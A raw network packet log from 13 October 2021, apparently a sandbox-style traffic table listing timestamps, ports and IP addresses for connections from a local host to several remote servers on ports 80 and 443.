Oct 13, 2021 15:52:05.064261913 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.064279079 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.064713001 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.064816952 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.064868927 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.064899921 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.065004110 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.065045118 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.065397978 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.065552950 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.065587997 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.065800905 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.065835953 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.065979004 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.066031933 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.066179991 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.066210032 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.066355944 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.066732883 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.066891909 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.066920996 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.066941023 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.067121029 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.067159891 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.067488909 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.067653894 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.067697048 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.067734003 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.067857981 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.067894936 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.068156958 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.068299055 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.068321943 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.068345070 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.068444967 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.076469898 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.076580048 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.076627016 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.076651096 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.076724052 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.076817036 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.076842070 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.076860905 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.076981068 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.077013016 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.077019930 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.077032089 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.077172995 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.077205896 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.077356100 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.077387094 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.077534914 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.077560902 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.077756882 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.077799082 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.077826023 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.077855110 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.077996969 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.079128981 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.079286098 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.079322100 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.079447031 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.079471111 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.079492092 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.079605103 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.079622984 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.079639912 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.079746008 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.079828024 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.079865932 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.079885960 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.079891920 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.080025911 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.080034018 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.080054998 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.080180883 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.080198050 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.080214024 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.080327034 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.080496073 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.080549955 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.080560923 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.080667973 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.080804110 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.080955982 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.080991983 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.081015110 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.081098080 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.081151962 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.081172943 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.081290960 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.081315041 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.081334114 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.081433058 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.081456900 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.081476927 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.081640005 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.081670046 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.081813097 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.081824064 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.081871033 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.081964016 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.082010984 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.082030058 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.082137108 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.082174063 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.082197905 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.082336903 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.082381964 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.083300114 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.083462954 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.083489895 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.083509922 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.083620071 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.083637953 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.083667994 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.083813906 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.083862066 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.083884954 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.083960056 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.084041119 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.084064007 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.084189892 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.084203959 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.084222078 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.084321022 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.084338903 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.084353924 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.084510088 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.084527016 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.084558010 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.084687948 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.084722996 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.084933996 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.085079908 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.085108042 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.085124969 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.085266113 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.085284948 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.085302114 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.085438013 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.085473061 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.085494041 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.085581064 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.085628033 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.085639954 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.085653067 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.085797071 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.085834026 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.085978031 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.086004972 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.086122036 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.086148024 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.086169004 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.086266041 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.086312056 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.086329937 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.086445093 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.086467028 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.086585999 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.086616039 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.086635113 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.086760044 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.086786032 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.086884022 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.086930990 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.086952925 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.087054968 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.087093115 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.087163925 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.087187052 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.087193966 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.087213039 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.087233067 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.087389946 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:11.743171930 CEST	49828	80	192.168.11.20	199.101.245.90
Oct 13, 2021 15:52:17.759336948 CEST	49833	80	192.168.11.20	199.101.245.90
Oct 13, 2021 15:52:18.532980919 CEST	49834	80	192.168.11.20	199.101.245.90
Oct 13, 2021 15:52:18.772752047 CEST	49833	80	192.168.11.20	199.101.245.90
Oct 13, 2021 15:52:19.538392067 CEST	49834	80	192.168.11.20	199.101.245.90
Oct 13, 2021 15:52:20.787914038 CEST	49833	80	192.168.11.20	199.101.245.90
Oct 13, 2021 15:52:21.537739038 CEST	49834	80	192.168.11.20	199.101.245.90
Oct 13, 2021 15:52:24.802700043 CEST	49833	80	192.168.11.20	199.101.245.90
Oct 13, 2021 15:52:25.552651882 CEST	49834	80	192.168.11.20	199.101.245.90
Oct 13, 2021 15:52:32.816540956 CEST	49833	80	192.168.11.20	199.101.245.90
Oct 13, 2021 15:52:33.566538095 CEST	49834	80	192.168.11.20	199.101.245.90
Oct 13, 2021 15:52:43.880582094 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.891163111 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.891405106 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.893030882 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.893110991 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.893171072 CEST	49839	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.903745890 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.903795958 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.903827906 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.903929949 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.904062986 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.904234886 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.904278040 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.904309034 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.904339075 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.904369116 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.904398918 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.904412985 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.904453039 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.904495001 CEST	80	49839	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.904599905 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.904687881 CEST	49839	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.904766083 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.904776096 CEST	49839	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.914535046 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.914757013 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.915030956 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.915139914 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.915280104 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.915318012 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.915397882 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.915431976 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.915461063 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.915484905 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.915509939 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.915541887 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.915666103 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.915705919 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.915776968 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.915810108 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.915841103 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.915843964 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.915910006 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.915944099 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.915973902 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.916003942 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.916033030 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.916062117 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.916078091 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.916091919 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.916213036 CEST	80	49839	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.916213036 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.916379929 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.925410986 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.925457001 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.925647020 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.925803900 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.926295042 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.926497936 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.926656008 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.926779032 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.926850080 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.926898003 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.926939011 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.926960945 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927027941 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.927082062 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927114010 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927145004 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927175045 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927206993 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.927301884 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927335024 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927366018 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927380085 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.927424908 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927457094 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927546978 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927560091 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.927613020 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927644968 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927675962 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927706003 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927738905 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927747011 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.927900076 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927911997 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.927964926 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.927995920 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.928026915 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.928056955 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.928149939 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.928471088 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.928505898 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.928536892 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.928566933 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.928596973 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.928627968 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.928658009 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.928687096 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.928716898 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.928746939 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.928781033 CEST	80	49838	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.928786039 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.928869009 CEST	49838	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.932427883 CEST	80	49839	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.932477951 CEST	80	49839	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:43.932709932 CEST	49839	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.932770014 CEST	49839	80	192.168.11.20	91.195.240.94
Oct 13, 2021 15:52:43.943442106 CEST	80	49839	91.195.240.94	192.168.11.20
Oct 13, 2021 15:52:48.938844919 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.947932959 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.948163986 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.949616909 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.949832916 CEST	49841	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.949867964 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.958688974 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.958741903 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.958878994 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.958885908 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.958966017 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.958988905 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.959081888 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.959095955 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.959141016 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.959147930 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.959191084 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.959330082 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.959387064 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.959419966 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.959450006 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.959486008 CEST	80	49841	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.959507942 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.959687948 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.959739923 CEST	49841	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.959780931 CEST	49841	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.967870951 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.967993021 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.968236923 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.968285084 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.968338966 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.968369961 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.968467951 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.968502045 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.968652010 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.968767881 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.968843937 CEST	80	49840	172.67.139.41	192.168.11.20
